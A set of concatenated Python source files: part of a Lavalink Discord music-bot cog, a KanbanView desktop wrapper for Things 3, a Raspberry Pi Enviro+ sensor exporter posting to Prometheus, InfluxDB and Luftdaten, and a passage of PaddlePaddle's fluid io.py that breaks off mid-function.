track = results['tracks'][0]
embed.title = 'Track Enqueued'
embed.description = f'[{track["info"]["title"]}]({track["info"]["uri"]})'
track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
player.add(requester=ctx.author.id, track=track)
await ctx.send(embed=embed)
if not player.is_playing:
await player.play()
@commands.command(aliases=['dc'])
async def disconnect(self, ctx):
""" Disconnects the player from the voice channel and clears its queue. """
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if not player.is_connected:
return await ctx.send('Not connected.')
if not ctx.author.voice or (player.is_connected and ctx.author.voice.channel.id != int(player.channel_id)):
return await ctx.send('You\'re not in my voicechannel!')
player.queue.clear()
await player.stop()
await self.connect_to(ctx.guild.id, None)
await ctx.send('*⃣ | Disconnected.')
|
things3_app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""KanbanView (app) for Things 3."""
from __future__ import print_function
# pylint: disable=duplicate-code
__author__ = "Alexander Willner"
__copyright__ = "Copyright 2020 Alexander Willner"
__credits__ = ["Luc Beaulieu", "Alexander Willner"]
__license__ = "Apache License 2.0"
__version__ = "2.6.3"
__maintainer__ = "Alexander Willner"
__email__ = "alex@willner.ws"
__status__ = "Development"
import sys
import signal
from os import system
from threading import Thread
import webview # type: ignore
import objc # type: ignore # pylint: disable=unused-import # noqa F401
import pkg_resources.py2_warn # type: ignore # pylint: disable=unused-import # noqa F401
import things3.things3_api as things3_api
class Things3App():
"""App wrapper for simple read-only API for Things 3."""
database = None
FILE = "kanban.html"
api = None
api_thread = None
def open_api(self):
"""Delay opening the browser."""
print(f"Using database 2: {self.database}")
self.api.main()
def __init__(self, database=None):
self.database = database
self.api = things3_api.Things3API(database=self.database)
def sigterm_handler(self, _signo, _stack_frame):
"""Make sure the server shuts down."""
print("Sigterm...")
self.api.flask_context.shutdown()
def main(self, appstore=False):
"""Run the app."""
# kill possible zombie processes; can't use psutil in py2app context
system('lsof -nti:' + str(things3_api.Things3API.port) +
' | xargs kill -9')
# Make sure the server shuts down
signal.signal(signal.SIGTERM, self.sigterm_handler)
print(f"Using database 1: {self.database}")
window = webview.create_window(
title='KanbanView',
url=f'http://{things3_api.Things3API.host}:' +
f'{things3_api.Things3API.port}/{self.FILE}',
width=1280, height=650,
min_size=(1280, 650),
frameless=True)
if not appstore:
window.closed += advertise
self.api_thread = Thread(target=self.open_api)
try:
self.api_thread.start()
webview.start() # blocking
self.api.flask_context.shutdown()
self.api_thread.join()
except KeyboardInterrupt:
print("Shutting down...")
self.api.flask_context.shutdown()
self.api_thread.join()
sys.exit(0)
def advertise():
"""Show a hint to buy the app"""
text = "Thank you for using KanbanView! " +\
"If you enjoy using it, please consider buying the app."
title = "KanbanView"
url = "https://kanbanview.app"
system("""osascript -e ' """ +
f"""set dialog to (display dialog "{text}" """ +
"""buttons {"Buy", "Later"} default button 1 """ +
f"""giving up after 10 """ +
f"""with title "{title}" """ +
f"""with icon POSIX file "resources/icon.icns")' """ +
f"""-e 'if the button returned of the result is "Buy" then' """ +
f"""-e 'do shell script "open {url}"' -e 'end if'""")
def main():
"""Main entry point for CLI installation"""
Things3App().main()
if __name__ == "__main__":
main()
|
enviroplus_exporter.py
|
#!/usr/bin/env python3
import os
import random
import requests
import time
import logging
import argparse
import subprocess
from threading import Thread
from prometheus_client import start_http_server, Gauge, Histogram
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003, ReadTimeoutError as pmsReadTimeoutError
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
try:
from smbus2 import SMBus
except ImportError:
from smbus import SMBus
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',
level=logging.INFO,
handlers=[logging.FileHandler("enviroplus_exporter.log"),
logging.StreamHandler()],
datefmt='%Y-%m-%d %H:%M:%S')
logging.info("""enviroplus_exporter.py - Expose readings from the Enviro+ sensor by Pimoroni in Prometheus format
Press Ctrl+C to exit!
""")
DEBUG = os.getenv('DEBUG', 'false') == 'true'
bus = SMBus(1)
bme280 = BME280(i2c_dev=bus)
pms5003 = PMS5003()
TEMPERATURE = Gauge('temperature','Temperature measured (*C)')
PRESSURE = Gauge('pressure','Pressure measured (hPa)')
HUMIDITY = Gauge('humidity','Relative humidity measured (%)')
OXIDISING = Gauge('oxidising','Mostly nitrogen dioxide but could include NO and Hydrogen (Ohms)')
REDUCING = Gauge('reducing', 'Mostly carbon monoxide but could include H2S, Ammonia, Ethanol, Hydrogen, Methane, Propane, Iso-butane (Ohms)')
NH3 = Gauge('NH3', 'mostly Ammonia but could also include Hydrogen, Ethanol, Propane, Iso-butane (Ohms)')
LUX = Gauge('lux', 'current ambient light level (lux)')
PROXIMITY = Gauge('proximity', 'proximity, with larger numbers being closer proximity and vice versa')
PM1 = Gauge('PM1', 'Particulate Matter of diameter less than 1 micron. Measured in micrograms per cubic metre (ug/m3)')
PM25 = Gauge('PM25', 'Particulate Matter of diameter less than 2.5 microns. Measured in micrograms per cubic metre (ug/m3)')
PM10 = Gauge('PM10', 'Particulate Matter of diameter less than 10 microns. Measured in micrograms per cubic metre (ug/m3)')
OXIDISING_HIST = Histogram('oxidising_measurements', 'Histogram of oxidising measurements', buckets=(0, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000, 50000, 55000, 60000, 65000, 70000, 75000, 80000, 85000, 90000, 100000))
REDUCING_HIST = Histogram('reducing_measurements', 'Histogram of reducing measurements', buckets=(0, 100000, 200000, 300000, 400000, 500000, 600000, 700000, 800000, 900000, 1000000, 1100000, 1200000, 1300000, 1400000, 1500000))
NH3_HIST = Histogram('nh3_measurements', 'Histogram of nh3 measurements', buckets=(0, 10000, 110000, 210000, 310000, 410000, 510000, 610000, 710000, 810000, 910000, 1010000, 1110000, 1210000, 1310000, 1410000, 1510000, 1610000, 1710000, 1810000, 1910000, 2000000))
PM1_HIST = Histogram('pm1_measurements', 'Histogram of Particulate Matter of diameter less than 1 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
PM25_HIST = Histogram('pm25_measurements', 'Histogram of Particulate Matter of diameter less than 2.5 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
PM10_HIST = Histogram('pm10_measurements', 'Histogram of Particulate Matter of diameter less than 10 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
# Setup InfluxDB
# You can generate an InfluxDB Token from the Tokens Tab in the InfluxDB Cloud UI
INFLUXDB_URL = os.getenv('INFLUXDB_URL', '')
INFLUXDB_TOKEN = os.getenv('INFLUXDB_TOKEN', '')
INFLUXDB_ORG_ID = os.getenv('INFLUXDB_ORG_ID', '')
INFLUXDB_BUCKET = os.getenv('INFLUXDB_BUCKET', '')
INFLUXDB_SENSOR_LOCATION = os.getenv('INFLUXDB_SENSOR_LOCATION', 'Adelaide')
INFLUXDB_TIME_BETWEEN_POSTS = int(os.getenv('INFLUXDB_TIME_BETWEEN_POSTS', '5'))
influxdb_client = InfluxDBClient(url=INFLUXDB_URL, token=INFLUXDB_TOKEN, org=INFLUXDB_ORG_ID)
influxdb_api = influxdb_client.write_api(write_options=SYNCHRONOUS)
# Setup Luftdaten
LUFTDATEN_TIME_BETWEEN_POSTS = int(os.getenv('LUFTDATEN_TIME_BETWEEN_POSTS', '30'))
# Sometimes the sensors can't be read. Resetting the i2c
def reset_i2c():
subprocess.run(['i2cdetect', '-y', '1'])
time.sleep(2)
# Get the temperature of the CPU for compensation
def get_cpu_temperature():
with open("/sys/class/thermal/thermal_zone0/temp", "r") as f:
temp = f.read()
temp = int(temp) / 1000.0
return temp
def get_temperature(factor):
"""Get temperature from the weather sensor"""
# Tuning factor for compensation. Decrease this number to adjust the
# temperature down, and increase to adjust up
raw_temp = bme280.get_temperature()
if factor:
cpu_temps = [get_cpu_temperature()] * 5
cpu_temp = get_cpu_temperature()
# Smooth out with some averaging to decrease jitter
cpu_temps = cpu_temps[1:] + [cpu_temp]
avg_cpu_temp = sum(cpu_temps) / float(len(cpu_temps))
temperature = raw_temp - ((avg_cpu_temp - raw_temp) / factor)
else:
temperature = raw_temp
TEMPERATURE.set(temperature) # Set to a given value
def get_pressure():
"""Get pressure from the weather sensor"""
try:
pressure = bme280.get_pressure()
PRESSURE.set(pressure)
except IOError:
logging.error("Could not get pressure readings. Resetting i2c.")
reset_i2c()
def get_humidity():
"""Get humidity from the weather sensor"""
try:
humidity = bme280.get_humidity()
HUMIDITY.set(humidity)
except IOError:
logging.error("Could not get humidity readings. Resetting i2c.")
reset_i2c()
def get_gas():
"""Get all gas readings"""
try:
readings = gas.read_all()
OXIDISING.set(readings.oxidising)
OXIDISING_HIST.observe(readings.oxidising)
REDUCING.set(readings.reducing)
REDUCING_HIST.observe(readings.reducing)
NH3.set(readings.nh3)
NH3_HIST.observe(readings.nh3)
except IOError:
logging.error("Could not get gas readings. Resetting i2c.")
reset_i2c()
def get_light():
"""Get all light readings"""
try:
lux = ltr559.get_lux()
prox = ltr559.get_proximity()
LUX.set(lux)
PROXIMITY.set(prox)
except IOError:
logging.error("Could not get lux and proximity readings. Resetting i2c.")
reset_i2c()
def get_particulates():
"""Get the particulate matter readings"""
try:
pms_data = pms5003.read()
except pmsReadTimeoutError:
logging.warning("Failed to read PMS5003")
except IOError:
logging.error("Could not get particulate matter readings. Resetting i2c.")
reset_i2c()
else:
PM1.set(pms_data.pm_ug_per_m3(1.0))
PM25.set(pms_data.pm_ug_per_m3(2.5))
PM10.set(pms_data.pm_ug_per_m3(10))
PM1_HIST.observe(pms_data.pm_ug_per_m3(1.0))
PM25_HIST.observe(pms_data.pm_ug_per_m3(2.5) - pms_data.pm_ug_per_m3(1.0))
PM10_HIST.observe(pms_data.pm_ug_per_m3(10) - pms_data.pm_ug_per_m3(2.5))
def collect_all_data():
"""Collects all the data currently set"""
sensor_data = {}
sensor_data['temperature'] = TEMPERATURE.collect()[0].samples[0].value
sensor_data['humidity'] = HUMIDITY.collect()[0].samples[0].value
sensor_data['pressure'] = PRESSURE.collect()[0].samples[0].value
sensor_data['oxidising'] = OXIDISING.collect()[0].samples[0].value
sensor_data['reducing'] = REDUCING.collect()[0].samples[0].value
sensor_data['nh3'] = NH3.collect()[0].samples[0].value
sensor_data['lux'] = LUX.collect()[0].samples[0].value
sensor_data['proximity'] = PROXIMITY.collect()[0].samples[0].value
sensor_data['pm1'] = PM1.collect()[0].samples[0].value
sensor_data['pm25'] = PM25.collect()[0].samples[0].value
sensor_data['pm10'] = PM10.collect()[0].samples[0].value
return sensor_data
def post_to_influxdb():
"""Post all sensor data to InfluxDB"""
name = 'enviroplus'
tag = ['location', 'adelaide']
while True:
time.sleep(INFLUXDB_TIME_BETWEEN_POSTS)
data_points = []
epoch_time_now = round(time.time())
sensor_data = collect_all_data()
for field_name in sensor_data:
data_points.append(Point('enviroplus').tag('location', INFLUXDB_SENSOR_LOCATION).field(field_name, sensor_data[field_name]))
try:
influxdb_api.write(bucket=INFLUXDB_BUCKET, record=data_points)
if DEBUG:
logging.info('InfluxDB response: OK')
except Exception as exception:
logging.warning('Exception sending to InfluxDB: {}'.format(exception))
def post_to_luftdaten():
"""Post relevant sensor data to luftdaten.info"""
"""Code from: https://github.com/sepulworld/balena-environ-plus"""
LUFTDATEN_SENSOR_UID = 'raspi-' + get_serial_number()
while True:
time.sleep(LUFTDATEN_TIME_BETWEEN_POSTS)
sensor_data = collect_all_data()
values = {}
values["P2"] = sensor_data['pm25']
values["P1"] = sensor_data['pm10']
values["temperature"] = "{:.2f}".format(sensor_data['temperature'])
values["pressure"] = "{:.2f}".format(sensor_data['pressure'] * 100)
values["humidity"] = "{:.2f}".format(sensor_data['humidity'])
pm_values = dict(i for i in values.items() if i[0].startswith('P'))
temperature_values = dict(i for i in values.items() if not i[0].startswith('P'))
try:
response_pin_1 = requests.post('https://api.luftdaten.info/v1/push-sensor-data/',
json={
"software_version": "enviro-plus 0.0.1",
"sensordatavalues": [{"value_type": key, "value": val} for
key, val in pm_values.items()]
},
headers={
"X-PIN": "1",
"X-Sensor": LUFTDATEN_SENSOR_UID,
"Content-Type": "application/json",
"cache-control": "no-cache"
}
)
response_pin_11 = requests.post('https://api.luftdaten.info/v1/push-sensor-data/',
json={
"software_version": "enviro-plus 0.0.1",
"sensordatavalues": [{"value_type": key, "value": val} for
key, val in temperature_values.items()]
},
headers={
"X-PIN": "11",
"X-Sensor": LUFTDATEN_SENSOR_UID,
"Content-Type": "application/json",
"cache-control": "no-cache"
}
)
if response_pin_1.ok and response_pin_11.ok:
if DEBUG:
logging.info('Luftdaten response: OK')
else:
logging.warning('Luftdaten response: Failed')
except Exception as exception:
logging.warning('Exception sending to Luftdaten: {}'.format(exception))
def get_serial_number():
"""Get Raspberry Pi serial number to use as LUFTDATEN_SENSOR_UID"""
with open('/proc/cpuinfo', 'r') as f:
for line in f:
if line[0:6] == 'Serial':
return str(line.split(":")[1].strip())
def str_to_bool(value):
if value.lower() in {'false', 'f', '0', 'no', 'n'}:
return False
elif value.lower() in {'true', 't', '1', 'yes', 'y'}:
return True
raise ValueError('{} is not a valid boolean value'.format(value))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bind", metavar='ADDRESS', default='0.0.0.0', help="Specify alternate bind address [default: 0.0.0.0]")
parser.add_argument("-p", "--port", metavar='PORT', default=8000, type=int, help="Specify alternate port [default: 8000]")
parser.add_argument("-f", "--factor", metavar='FACTOR', type=float, help="The compensation factor to get better temperature results when the Enviro+ pHAT is too close to the Raspberry Pi board")
parser.add_argument("-e", "--enviro", metavar='ENVIRO', type=str_to_bool, help="Device is an Enviro (not Enviro+) so don't fetch data from gas and particulate sensors as they don't exist")
parser.add_argument("-d", "--debug", metavar='DEBUG', type=str_to_bool, help="Turns on more verbose logging, showing sensor output and post responses [default: false]")
parser.add_argument("-i", "--influxdb", metavar='INFLUXDB', type=str_to_bool, default='false', help="Post sensor data to InfluxDB [default: false]")
parser.add_argument("-l", "--luftdaten", metavar='LUFTDATEN', type=str_to_bool, default='false', help="Post sensor data to Luftdaten [default: false]")
args = parser.parse_args()
# Start up the server to expose the metrics.
start_http_server(addr=args.bind, port=args.port)
# Generate some requests.
if args.debug:
DEBUG = True
if args.factor:
logging.info("Using compensating algorithm (factor={}) to account for heat leakage from Raspberry Pi board".format(args.factor))
if args.influxdb:
# Post to InfluxDB in another thread
logging.info("Sensor data will be posted to InfluxDB every {} seconds".format(INFLUXDB_TIME_BETWEEN_POSTS))
influx_thread = Thread(target=post_to_influxdb)
influx_thread.start()
if args.luftdaten:
# Post to Luftdaten in another thread
LUFTDATEN_SENSOR_UID = 'raspi-' + get_serial_number()
logging.info("Sensor data will be posted to Luftdaten every {} seconds for the UID {}".format(LUFTDATEN_TIME_BETWEEN_POSTS, LUFTDATEN_SENSOR_UID))
luftdaten_thread = Thread(target=post_to_luftdaten)
luftdaten_thread.start()
logging.info("Listening on http://{}:{}".format(args.bind, args.port))
while True:
time.sleep(0.5)
get_temperature(args.factor)
get_pressure()
get_humidity()
get_light()
if not args.enviro:
get_gas()
# get_particulates()
if DEBUG:
logging.info('Sensor data: {}'.format(collect_all_data()))
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1].
2. If shape contains -1, such as shape=[1, -1],
append_batch_size will be enforced to be be False (ineffective).
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
